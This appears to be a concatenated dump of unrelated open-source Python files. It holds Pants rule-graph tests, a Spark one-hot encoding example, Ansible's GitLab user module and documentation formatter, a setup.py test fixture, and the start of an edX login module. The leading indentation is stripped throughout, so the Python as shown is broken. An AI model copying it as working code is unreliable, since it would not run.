fullgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
}""").strip(), fullgraph)
def test_full_graph_for_planner_example(self):
symbol_table = TargetTable()
address_mapper = AddressMapper(JsonParser(symbol_table), '*.BUILD.json')
rules = create_graph_rules(address_mapper, symbol_table) + create_fs_rules()
fullgraph_str = self.create_full_graph(rules)
print('---diagnostic------')
print(fullgraph_str)
print('/---diagnostic------')
in_root_rules = False
in_all_rules = False
all_rules = []
root_rule_lines = []
for line in fullgraph_str.splitlines():
if line.startswith(' // root subject types:'):
pass
elif line.startswith(' // root entries'):
in_root_rules = True
elif line.startswith(' // internal entries'):
in_all_rules = True
elif in_all_rules:
all_rules.append(line)
elif in_root_rules:
root_rule_lines.append(line)
else:
pass
self.assertTrue(6 < len(all_rules))
self.assertTrue(12 < len(root_rule_lines)) # 2 lines per entry
def test_smallest_full_test_multiple_root_subject_types(self):
rules = [
RootRule(SubA),
RootRule(A),
TaskRule(A, [Select(SubA)], noop),
TaskRule(B, [Select(A)], noop)
]
fullgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: A, SubA
// root entries
"Select(A) for A" [color=blue]
"Select(A) for A" -> {"SubjectIsProduct(A)"}
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
"Select(B) for A" [color=blue]
"Select(B) for A" -> {"(B, (Select(A),), noop) of A"}
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, (Select(A),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
"(B, (Select(A),), noop) of A" -> {"SubjectIsProduct(A)"}
"(B, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
}""").strip(),
fullgraph)
def test_single_rule_depending_on_subject_selection(self):
rules = [
TaskRule(Exactly(A), [Select(SubA)], noop)
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
}""").strip(),
subgraph)
def test_multiple_selects(self):
rules = [
TaskRule(Exactly(A), [Select(SubA), Select(B)], noop),
TaskRule(B, [], noop)
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA), Select(B)), noop) of SubA"}
// internal entries
"(A, (Select(SubA), Select(B)), noop) of SubA" -> {"SubjectIsProduct(SubA)" "(B, (,), noop) of SubA"}
"(B, (,), noop) of SubA" -> {}
}""").strip(),
subgraph)
def test_one_level_of_recursion(self):
rules = [
TaskRule(Exactly(A), [Select(B)], noop),
TaskRule(B, [Select(SubA)], noop)
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(B),), noop) of SubA"}
// internal entries
"(A, (Select(B),), noop) of SubA" -> {"(B, (Select(SubA),), noop) of SubA"}
"(B, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
}""").strip(),
subgraph)
def test_noop_removal_in_subgraph(self):
rules = [
TaskRule(Exactly(A), [Select(C)], noop),
TaskRule(Exactly(A), [], noop),
SingletonRule(B, B()),
]
subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), noop) of SubA"}
// internal entries
"(A, (,), noop) of SubA" -> {}
}""").strip(),
subgraph)
def test_noop_removal_full_single_subject_type(self):
rules = _suba_root_rules + [
TaskRule(Exactly(A), [Select(C)], noop),
TaskRule(Exactly(A), [], noop),
]
fullgraph = self.create_full_graph(rules, validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), noop) of SubA"}
// internal entries
"(A, (,), noop) of SubA" -> {}
}""").strip(),
fullgraph)
def test_root_tuple_removed_when_no_matches(self):
rules = [
RootRule(C),
RootRule(D),
TaskRule(Exactly(A), [Select(C)], noop),
TaskRule(Exactly(B), [Select(D), Select(A)], noop),
]
fullgraph = self.create_full_graph(rules, validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: C, D
// root entries
"Select(A) for C" [color=blue]
"Select(A) for C" -> {"(A, (Select(C),), noop) of C"}
// internal entries
"(A, (Select(C),), noop) of C" -> {"SubjectIsProduct(C)"}
}""").strip(),
fullgraph)
def test_noop_removal_transitive(self):
# If a noop-able rule has rules that depend on it,
# they should be removed from the graph.
rules = [
TaskRule(Exactly(B), [Select(C)], noop),
TaskRule(Exactly(A), [Select(B)], noop),
TaskRule(Exactly(A), [], noop),
]
subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), noop) of SubA"}
// internal entries
"(A, (,), noop) of SubA" -> {}
}""").strip(),
subgraph)
def test_get_with_matching_singleton(self):
rules = [
TaskRule(Exactly(A), [Select(SubA)], noop, input_gets=[Get(B, C)]),
SingletonRule(B, B()),
]
subgraph = self.create_subgraph(A, rules, SubA())
#TODO perhaps singletons should be marked in the dot format somehow
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), [Get(B, C)], noop) of SubA"}
// internal entries
"(A, (Select(SubA),), [Get(B, C)], noop) of SubA" -> {"SubjectIsProduct(SubA)" "Singleton(B(), B)"}
}""").strip(),
subgraph)
def test_depends_on_multiple_one_noop(self):
rules = [
TaskRule(B, [Select(A)], noop),
TaskRule(A, [Select(C)], noop),
TaskRule(A, [Select(SubA)], noop)
]
subgraph = self.create_subgraph(B, rules, SubA(), validate=False)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, (Select(A),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
"(B, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
}""").strip(),
subgraph)
def test_multiple_depend_on_same_rule(self):
rules = _suba_root_rules + [
TaskRule(B, [Select(A)], noop),
TaskRule(C, [Select(A)], noop),
TaskRule(A, [Select(SubA)], noop)
]
subgraph = self.create_full_graph(rules)
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
"Select(B) for SubA" [color=blue]
"Select(B) for SubA" -> {"(B, (Select(A),), noop) of SubA"}
"Select(C) for SubA" [color=blue]
"Select(C) for SubA" -> {"(C, (Select(A),), noop) of SubA"}
// internal entries
"(A, (Select(SubA),), noop) of SubA" -> {"SubjectIsProduct(SubA)"}
"(B, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
"(C, (Select(A),), noop) of SubA" -> {"(A, (Select(SubA),), noop) of SubA"}
}""").strip(),
subgraph)
def test_get_simple(self):
rules = [
TaskRule(Exactly(A), [], noop, [Get(B, D)]),
TaskRule(B, [Select(D)], noop),
]
subgraph = self.create_subgraph(A, rules, SubA())
self.assert_equal_with_printing(dedent("""
digraph {
// root subject types: SubA
// root entries
"Select(A) for SubA" [color=blue]
"Select(A) for SubA" -> {"(A, (,), [Get(B, D)], noop) of SubA"}
// internal entries
"(A, (,), [Get(B, D)], noop) of SubA" -> {"(B, (Select(D),), noop) of D"}
"(B, (Select(D),), noop) of D" -> {"SubjectIsProduct(D)"}
}""").strip(),
subgraph)
def create_full_graph(self, rules, validate=True):
scheduler = create_scheduler(rules, validate=validate)
return "\n".join(scheduler.rule_graph_visualization())
def create_subgraph(self, requested_product, rules, subject, validate=True):
scheduler = create_scheduler(rules + _suba_root_rules, validate=validate)
return "\n".join(scheduler.rule_subgraph_visualization(type(subject), requested_product))
assert_equal_with_printing = assert_equal_with_printing
|
byakuinss/spark
|
refs/heads/master
|
examples/src/main/python/ml/onehot_encoder_example.py
|
72
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
# $example on$
from pyspark.ml.feature import OneHotEncoder, StringIndexer
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("OneHotEncoderExample")\
.getOrCreate()
# $example on$
df = spark.createDataFrame([
(0, "a"),
(1, "b"),
(2, "c"),
(3, "a"),
(4, "a"),
(5, "c")
], ["id", "category"])
stringIndexer = StringIndexer(inputCol="category", outputCol="categoryIndex")
model = stringIndexer.fit(df)
indexed = model.transform(df)
encoder = OneHotEncoder(inputCol="categoryIndex", outputCol="categoryVec")
encoded = encoder.transform(indexed)
encoded.show()
# $example off$
spark.stop()
|
nitzmahone/ansible-modules-extras
|
refs/heads/devel
|
source_control/gitlab_user.py
|
23
|
#!/usr/bin/python
# (c) 2015, Werner Dijkerman (ikben@werner-dijkerman.nl)
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gitlab_user
short_description: Creates/updates/deletes Gitlab Users
description:
- When the user does not exists in Gitlab, it will be created.
- When the user does exists and state=absent, the user will be deleted.
- When changes are made to user, the user will be updated.
version_added: "2.1"
author: "Werner Dijkerman (@dj-wasabi)"
requirements:
- pyapi-gitlab python module
options:
server_url:
description:
- Url of Gitlab server, with protocol (http or https).
required: true
validate_certs:
description:
- When using https if SSL certificate needs to be verified.
required: false
default: true
aliases:
- verify_ssl
login_user:
description:
- Gitlab user name.
required: false
default: null
login_password:
description:
- Gitlab password for login_user
required: false
default: null
login_token:
description:
- Gitlab token for logging in.
required: false
default: null
name:
description:
- Name of the user you want to create
required: true
username:
description:
- The username of the user.
required: true
password:
description:
- The password of the user.
required: true
email:
description:
- The email that belongs to the user.
required: true
sshkey_name:
description:
- The name of the sshkey
required: false
default: null
sshkey_file:
description:
- The ssh key itself.
required: false
default: null
group:
description:
- Add user as an member to this group.
required: false
default: null
access_level:
description:
- The access level to the group. One of the following can be used.
- guest
- reporter
- developer
- master
- owner
required: false
default: null
state:
description:
- create or delete group.
- Possible values are present and absent.
required: false
default: present
choices: ["present", "absent"]
'''
EXAMPLES = '''
- name: "Delete Gitlab User"
local_action: gitlab_user
server_url="http://gitlab.dj-wasabi.local"
validate_certs=false
login_token="WnUzDsxjy8230-Dy_k"
username=myusername
state=absent
- name: "Create Gitlab User"
local_action: gitlab_user
server_url="https://gitlab.dj-wasabi.local"
validate_certs=true
login_user=dj-wasabi
login_password="MySecretPassword"
name=My Name
username=myusername
password=mysecretpassword
email=me@home.com
sshkey_name=MySSH
sshkey_file=ssh-rsa AAAAB3NzaC1yc...
state=present
'''
RETURN = '''# '''
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except:
HAS_GITLAB_PACKAGE = False
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.basic import *
class GitLabUser(object):
def __init__(self, module, git):
self._module = module
self._gitlab = git
def addToGroup(self, group_id, user_id, access_level):
if access_level == "guest":
level = 10
elif access_level == "reporter":
level = 20
elif access_level == "developer":
level = 30
elif access_level == "master":
level = 40
elif access_level == "owner":
level = 50
return self._gitlab.addgroupmember(group_id, user_id, level)
def createOrUpdateUser(self, user_name, user_username, user_password, user_email, user_sshkey_name, user_sshkey_file, group_name, access_level):
group_id = ''
arguments = {"name": user_name,
"username": user_username,
"email": user_email}
if group_name is not None:
if self.existsGroup(group_name):
group_id = self.getGroupId(group_name)
if self.existsUser(user_username):
self.updateUser(group_id, user_sshkey_name, user_sshkey_file, access_level, arguments)
else:
if self._module.check_mode:
self._module.exit_json(changed=True)
self.createUser(group_id, user_password, user_sshkey_name, user_sshkey_file, access_level, arguments)
def createUser(self, group_id, user_password, user_sshkey_name, user_sshkey_file, access_level, arguments):
user_changed = False
# Create the user
user_username = arguments['username']
user_name = arguments['name']
user_email = arguments['email']
if self._gitlab.createuser(password=user_password, **arguments):
user_id = self.getUserId(user_username)
if self._gitlab.addsshkeyuser(user_id=user_id, title=user_sshkey_name, key=user_sshkey_file):
user_changed = True
# Add the user to the group if group_id is not empty
if group_id != '':
if self.addToGroup(group_id, user_id, access_level):
user_changed = True
user_changed = True
# Exit with change to true or false
if user_changed:
self._module.exit_json(changed=True, result="Created the user")
else:
self._module.exit_json(changed=False)
def deleteUser(self, user_username):
user_id = self.getUserId(user_username)
if self._gitlab.deleteuser(user_id):
self._module.exit_json(changed=True, result="Successfully deleted user %s" % user_username)
else:
self._module.exit_json(changed=False, result="User %s already deleted or something went wrong" % user_username)
def existsGroup(self, group_name):
for group in self._gitlab.getall(self._gitlab.getgroups):
if group['name'] == group_name:
return True
return False
def existsUser(self, username):
found_user = self._gitlab.getusers(search=username)
for user in found_user:
if user['id'] != '':
return True
return False
def getGroupId(self, group_name):
for group in self._gitlab.getall(self._gitlab.getgroups):
if group['name'] == group_name:
return group['id']
def getUserId(self, username):
found_user = self._gitlab.getusers(search=username)
for user in found_user:
if user['id'] != '':
return user['id']
def updateUser(self, group_id, user_sshkey_name, user_sshkey_file, access_level, arguments):
user_changed = False
user_username = arguments['username']
user_id = self.getUserId(user_username)
user_data = self._gitlab.getuser(user_id=user_id)
# Lets check if we need to update the user
for arg_key, arg_value in arguments.items():
if user_data[arg_key] != arg_value:
user_changed = True
if user_changed:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._gitlab.edituser(user_id=user_id, **arguments)
user_changed = True
if self._module.check_mode or self._gitlab.addsshkeyuser(user_id=user_id, title=user_sshkey_name, key=user_sshkey_file):
user_changed = True
if group_id != '':
if self._module.check_mode or self.addToGroup(group_id, user_id, access_level):
user_changed = True
if user_changed:
self._module.exit_json(changed=True, result="The user %s is updated" % user_username)
else:
self._module.exit_json(changed=False, result="The user %s is already up2date" % user_username)
def main():
global user_id
module = AnsibleModule(
argument_spec=dict(
server_url=dict(required=True),
validate_certs=dict(required=False, default=True, type='bool', aliases=['verify_ssl']),
login_user=dict(required=False, no_log=True),
login_password=dict(required=False, no_log=True),
login_token=dict(required=False, no_log=True),
name=dict(required=True),
username=dict(required=True),
password=dict(required=True),
email=dict(required=True),
sshkey_name=dict(required=False),
sshkey_file=dict(required=False),
group=dict(required=False),
access_level=dict(required=False, choices=["guest", "reporter", "developer", "master", "owner"]),
state=dict(default="present", choices=["present", "absent"]),
),
supports_check_mode=True
)
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg="Missing required gitlab module (check docs or install with: pip install pyapi-gitlab")
server_url = module.params['server_url']
verify_ssl = module.params['validate_certs']
login_user = module.params['login_user']
login_password = module.params['login_password']
login_token = module.params['login_token']
user_name = module.params['name']
user_username = module.params['username']
user_password = module.params['password']
user_email = module.params['email']
user_sshkey_name = module.params['sshkey_name']
user_sshkey_file = module.params['sshkey_file']
group_name = module.params['group']
access_level = module.params['access_level']
state = module.params['state']
# We need both login_user and login_password or login_token, otherwise we fail.
if login_user is not None and login_password is not None:
use_credentials = True
elif login_token is not None:
use_credentials = False
else:
module.fail_json(msg="No login credentials are given. Use login_user with login_password, or login_token")
# Check if vars are none
if user_sshkey_file is not None and user_sshkey_name is not None:
use_sshkey = True
else:
use_sshkey = False
if group_name is not None and access_level is not None:
add_to_group = True
group_name = group_name.lower()
else:
add_to_group = False
user_username = user_username.lower()
# Lets make an connection to the Gitlab server_url, with either login_user and login_password
# or with login_token
try:
if use_credentials:
git = gitlab.Gitlab(host=server_url)
git.login(user=login_user, password=login_password)
else:
git = gitlab.Gitlab(server_url, token=login_token, verify_ssl=verify_ssl)
except Exception:
e = get_exception()
module.fail_json(msg="Failed to connect to Gitlab server: %s " % e)
# Validate if group exists and take action based on "state"
user = GitLabUser(module, git)
# Check if user exists, if not exists and state = absent, we exit nicely.
if not user.existsUser(user_username) and state == "absent":
module.exit_json(changed=False, result="User already deleted or does not exists")
else:
# User exists,
if state == "absent":
user.deleteUser(user_username)
else:
user.createOrUpdateUser(user_name, user_username, user_password, user_email, user_sshkey_name, user_sshkey_file, group_name, access_level)
if __name__ == '__main__':
main()
|
hellofreedom/ansible
|
refs/heads/devel
|
hacking/module_formatter.py
|
68
|
#!/usr/bin/env python
# (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# (c) 2012-2014, Michael DeHaan <michael@ansible.com> and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import print_function
import os
import glob
import sys
import yaml
import codecs
import json
import ast
import re
import optparse
import time
import datetime
import subprocess
import cgi
import warnings
from jinja2 import Environment, FileSystemLoader
from six import iteritems
from ansible.utils import module_docs
from ansible.utils.vars import merge_hash
from ansible.errors import AnsibleError
#####################################################################################
# constants and paths
# if a module is added in a version of Ansible older than this, don't print the version added information
# in the module documentation because everyone is assumed to be running something newer than this already.
TO_OLD_TO_BE_NOTABLE = 1.3
# Get parent directory of the directory this script lives in
MODULEDIR=os.path.abspath(os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir, 'lib', 'ansible', 'modules'
))
# The name of the DOCUMENTATION template
EXAMPLE_YAML=os.path.abspath(os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir, 'examples', 'DOCUMENTATION.yml'
))
_ITALIC = re.compile(r"I\(([^)]+)\)")
_BOLD = re.compile(r"B\(([^)]+)\)")
_MODULE = re.compile(r"M\(([^)]+)\)")
_URL = re.compile(r"U\(([^)]+)\)")
_CONST = re.compile(r"C\(([^)]+)\)")
DEPRECATED = " (D)"
NOTCORE = " (E)"
#####################################################################################
def rst_ify(text):
''' convert symbols like I(this is in italics) to valid restructured text '''
try:
t = _ITALIC.sub(r'*' + r"\1" + r"*", text)
t = _BOLD.sub(r'**' + r"\1" + r"**", t)
t = _MODULE.sub(r':ref:`' + r"\1 <\1>" + r"`", t)
t = _URL.sub(r"\1", t)
t = _CONST.sub(r'``' + r"\1" + r"``", t)
except Exception as e:
raise AnsibleError("Could not process (%s) : %s" % (str(text), str(e)))
return t
#####################################################################################
def html_ify(text):
''' convert symbols like I(this is in italics) to valid HTML '''
t = cgi.escape(text)
t = _ITALIC.sub("<em>" + r"\1" + "</em>", t)
t = _BOLD.sub("<b>" + r"\1" + "</b>", t)
t = _MODULE.sub("<span class='module'>" + r"\1" + "</span>", t)
t = _URL.sub("<a href='" + r"\1" + "'>" + r"\1" + "</a>", t)
t = _CONST.sub("<code>" + r"\1" + "</code>", t)
return t
#####################################################################################
def rst_fmt(text, fmt):
''' helper for Jinja2 to do format strings '''
return fmt % (text)
#####################################################################################
def rst_xline(width, char="="):
''' return a restructured text line of a given length '''
return char * width
#####################################################################################
def write_data(text, options, outputname, module):
''' dumps module output to a file or the screen, as requested '''
if options.output_dir is not None:
fname = os.path.join(options.output_dir, outputname % module)
fname = fname.replace(".py","")
f = open(fname, 'w')
f.write(text.encode('utf-8'))
f.close()
else:
print(text)
#####################################################################################
def list_modules(module_dir, depth=0):
''' returns a hash of categories, each category being a hash of module names to file paths '''
categories = dict(all=dict(),_aliases=dict())
if depth <= 3: # limit # of subdirs
files = glob.glob("%s/*" % module_dir)
for d in files:
category = os.path.splitext(os.path.basename(d))[0]
if os.path.isdir(d):
res = list_modules(d, depth + 1)
for key in res.keys():
if key in categories:
categories[key] = merge_hash(categories[key], res[key])
res.pop(key, None)
if depth < 2:
categories.update(res)
else:
category = module_dir.split("/")[-1]
if not category in categories:
categories[category] = res
else:
categories[category].update(res)
else:
module = category
category = os.path.basename(module_dir)
if not d.endswith(".py") or d.endswith('__init__.py'):
# windows powershell modules have documentation stubs in python docstring
# format (they are not executed) so skip the ps1 format files
continue
elif module.startswith("_") and os.path.islink(d):
source = os.path.splitext(os.path.basename(os.path.realpath(d)))[0]
module = module.replace("_","",1)
if not d in categories['_aliases']:
categories['_aliases'][source] = [module]
else:
categories['_aliases'][source].update(module)
continue
if not category in categories:
categories[category] = {}
categories[category][module] = d
categories['all'][module] = d
return categories
#####################################################################################
def generate_parser():
''' generate an optparse parser '''
p = optparse.OptionParser(
version='%prog 1.0',
usage='usage: %prog [options] arg1 arg2',
description='Generate module documentation from metadata',
)
p.add_option("-A", "--ansible-version", action="store", dest="ansible_version", default="unknown", help="Ansible version number")
p.add_option("-M", "--module-dir", action="store", dest="module_dir", default=MODULEDIR, help="Ansible library path")
p.add_option("-T", "--template-dir", action="store", dest="template_dir", default="hacking/templates", help="directory containing Jinja2 templates")
p.add_option("-t", "--type", action='store', dest='type', choices=['rst'], default='rst', help="Document type")
p.add_option("-v", "--verbose", action='store_true', default=False, help="Verbose")
p.add_option("-o", "--output-dir", action="store", dest="output_dir", default=None, help="Output directory for module files")
p.add_option("-I", "--includes-file", action="store", dest="includes_file", default=None, help="Create a file containing list of processed modules")
p.add_option('-V', action='version', help='Show version number and exit')
return p
#####################################################################################
def jinja2_environment(template_dir, typ):
env = Environment(loader=FileSystemLoader(template_dir),
variable_start_string="@{",
variable_end_string="}@",
trim_blocks=True,
)
env.globals['xline'] = rst_xline
if typ == 'rst':
env.filters['convert_symbols_to_format'] = rst_ify
env.filters['html_ify'] = html_ify
env.filters['fmt'] = rst_fmt
env.filters['xline'] = rst_xline
template = env.get_template('rst.j2')
outputname = "%s_module.rst"
else:
raise Exception("unknown module format type: %s" % typ)
return env, template, outputname
#####################################################################################
def too_old(added):
if not added:
return False
try:
added_tokens = str(added).split(".")
readded = added_tokens[0] + "." + added_tokens[1]
added_float = float(readded)
except ValueError as e:
warnings.warn("Could not parse %s: %s" % (added, str(e)))
return False
return (added_float < TO_OLD_TO_BE_NOTABLE)
def process_module(module, options, env, template, outputname, module_map, aliases):
fname = module_map[module]
if isinstance(fname, dict):
return "SKIPPED"
basename = os.path.basename(fname)
deprecated = False
# ignore files with extensions
if not basename.endswith(".py"):
return
elif module.startswith("_"):
if os.path.islink(fname):
return # ignore, its an alias
deprecated = True
module = module.replace("_","",1)
print("rendering: %s" % module)
# use ansible core library to parse out doc metadata YAML and plaintext examples
doc, examples, returndocs = module_docs.get_docstring(fname, verbose=options.verbose)
# crash if module is missing documentation and not explicitly hidden from docs index
if doc is None:
if module in module_docs.BLACKLIST_MODULES:
return "SKIPPED"
else:
sys.stderr.write("*** ERROR: MODULE MISSING DOCUMENTATION: %s, %s ***\n" % (fname, module))
sys.exit(1)
if deprecated and 'deprecated' not in doc:
sys.stderr.write("*** ERROR: DEPRECATED MODULE MISSING 'deprecated' DOCUMENTATION: %s, %s ***\n" % (fname, module))
sys.exit(1)
if "/core/" in fname:
doc['core'] = True
else:
doc['core'] = False
if module in aliases:
doc['aliases'] = aliases[module]
all_keys = []
if not 'version_added' in doc:
sys.stderr.write("*** ERROR: missing version_added in: %s ***\n" % module)
sys.exit(1)
added = 0
if doc['version_added'] == 'historical':
del doc['version_added']
else:
added = doc['version_added']
# don't show version added information if it's too old to be called out
if too_old(added):
del doc['version_added']
if 'options' in doc and doc['options']:
for (k,v) in iteritems(doc['options']):
# don't show version added information if it's too old to be called out
if 'version_added' in doc['options'][k] and too_old(doc['options'][k]['version_added']):
del doc['options'][k]['version_added']
all_keys.append(k)
all_keys = sorted(all_keys)
doc['option_keys'] = all_keys
doc['filename'] = fname
doc['docuri'] = doc['module'].replace('_', '-')
doc['now_date'] = datetime.date.today().strftime('%Y-%m-%d')
doc['ansible_version'] = options.ansible_version
doc['plainexamples'] = examples #plain text
if returndocs:
doc['returndocs'] = yaml.safe_load(returndocs)
else:
doc['returndocs'] = None
# here is where we build the table of contents...
try:
text = template.render(doc)
except Exception as e:
raise AnsibleError("Failed to render doc for %s: %s" % (fname, str(e)))
write_data(text, options, outputname, module)
return doc['short_description']
#####################################################################################
def print_modules(module, category_file, deprecated, core, options, env, template, outputname, module_map, aliases):
modstring = module
modname = module
if module in deprecated:
modstring = modstring + DEPRECATED
modname = "_" + module
elif module not in core:
modstring = modstring + NOTCORE
result = process_module(modname, options, env, template, outputname, module_map, aliases)
if result != "SKIPPED":
category_file.write(" %s - %s <%s_module>\n" % (modstring, rst_ify(result), module))
def process_category(category, categories, options, env, template, outputname):
module_map = categories[category]
aliases = {}
if '_aliases' in categories:
aliases = categories['_aliases']
category_file_path = os.path.join(options.output_dir, "list_of_%s_modules.rst" % category)
category_file = open(category_file_path, "w")
print("*** recording category %s in %s ***" % (category, category_file_path))
# start a new category file
category = category.replace("_"," ")
category = category.title()
modules = []
deprecated = []
core = []
for module in module_map.keys():
if isinstance(module_map[module], dict):
for mod in module_map[module].keys():
if mod.startswith("_"):
mod = mod.replace("_","",1)
deprecated.append(mod)
elif '/core/' in module_map[module][mod]:
core.append(mod)
else:
if module.startswith("_"):
module = module.replace("_","",1)
deprecated.append(module)
elif '/core/' in module_map[module]:
core.append(module)
modules.append(module)
modules.sort()
category_header = "%s Modules" % (category.title())
underscores = "`" * len(category_header)
category_file.write("""\
%s
%s
.. toctree:: :maxdepth: 1
""" % (category_header, underscores))
sections = []
for module in modules:
if module in module_map and isinstance(module_map[module], dict):
sections.append(module)
continue
else:
print_modules(module, category_file, deprecated, core, options, env, template, outputname, module_map, aliases)
sections.sort()
for section in sections:
category_file.write("\n%s\n%s\n\n" % (section.replace("_"," ").title(),'-' * len(section)))
category_file.write(".. toctree:: :maxdepth: 1\n\n")
section_modules = module_map[section].keys()
section_modules.sort()
#for module in module_map[section]:
for module in section_modules:
print_modules(module, category_file, deprecated, core, options, env, template, outputname, module_map[section], aliases)
category_file.write("""\n\n
.. note::
- %s: This marks a module as deprecated, which means a module is kept for backwards compatibility but usage is discouraged. The module documentation details page may explain more about this rationale.
- %s: This marks a module as 'extras', which means it ships with ansible but may be a newer module and possibly (but not necessarily) less actively maintained than 'core' modules.
- Tickets filed on modules are filed to different repos than those on the main open source project. Core module tickets should be filed at `ansible/ansible-modules-core on GitHub <http://github.com/ansible/ansible-modules-core>`_, extras tickets to `ansible/ansible-modules-extras on GitHub <http://github.com/ansible/ansible-modules-extras>`_
""" % (DEPRECATED, NOTCORE))
category_file.close()
# TODO: end a new category file
#####################################################################################
def validate_options(options):
''' validate option parser options '''
if not options.module_dir:
print("--module-dir is required", file=sys.stderr)
sys.exit(1)
if not os.path.exists(options.module_dir):
print("--module-dir does not exist: %s" % options.module_dir, file=sys.stderr)
sys.exit(1)
if not options.template_dir:
print("--template-dir must be specified")
sys.exit(1)
#####################################################################################
def main():
p = generate_parser()
(options, args) = p.parse_args()
validate_options(options)
env, template, outputname = jinja2_environment(options.template_dir, options.type)
categories = list_modules(options.module_dir)
last_category = None
category_names = categories.keys()
category_names.sort()
category_list_path = os.path.join(options.output_dir, "modules_by_category.rst")
category_list_file = open(category_list_path, "w")
category_list_file.write("Module Index\n")
category_list_file.write("============\n")
category_list_file.write("\n\n")
category_list_file.write(".. toctree::\n")
category_list_file.write(" :maxdepth: 1\n\n")
for category in category_names:
if category.startswith("_"):
continue
category_list_file.write(" list_of_%s_modules\n" % category)
process_category(category, categories, options, env, template, outputname)
category_list_file.close()
if __name__ == '__main__':
main()
|
si618/pi-time
|
refs/heads/master
|
node_modules/grunt-nose/test/fixtures/virtualenv_exclusive/setup.py
|
2
|
#!/usr/bin/env python
""" This is a test module to test that virtualenv activation works. """
from setuptools import setup
setup(
name='venv_exclusive',
version='0.1.0',
py_modules=['venv_exclusive'],
)
|
kxliugang/edx-platform
|
refs/heads/master
|
common/djangoapps/external_auth/login_and_register.py
|
150
|
"""Intercept login and registration requests.
This module contains legacy code originally from `student.views`.
"""
import re
from django.conf import settings
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import external_auth.views
from xmodule.modulestore.django import modulestore
from opaque_keys.edx.keys import CourseKey
